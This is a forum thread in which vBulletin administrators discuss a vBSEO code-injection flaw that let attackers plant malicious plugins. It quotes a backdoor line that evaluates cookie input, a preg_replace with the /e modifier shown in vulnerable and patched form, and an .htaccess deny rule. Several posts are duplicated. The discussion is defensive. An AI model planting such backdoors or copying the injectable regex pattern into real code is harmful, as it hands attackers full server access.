Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!
Possible Exploit
Collapse
X
-
Just in case - you do have the following .htaccess protection in all writable directories?
Code:<Files ~ "\.(php\d*|cgi|pl|phtml)$"> order allow,deny deny from all </Files>
My Live vB5 Site - NZEating.com
vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.Comment
-
Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.Comment
-
It is vBSEO.
All our non-vBSEO sites did not get hacked.
All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.
All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.
We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.
There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.Comment
-
I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:
eval($_COOKIE['c']);
Here is a site that references a PHP compromise with similar code...
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns
This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
-
-
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!Comment
-
Here it is folks, in functions_vbseocp_abstract.php
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
Comment
-
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!Comment
-
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before the patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information than you should share it.Comment
-
I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in november, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that unless it was a vulnerability that was been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment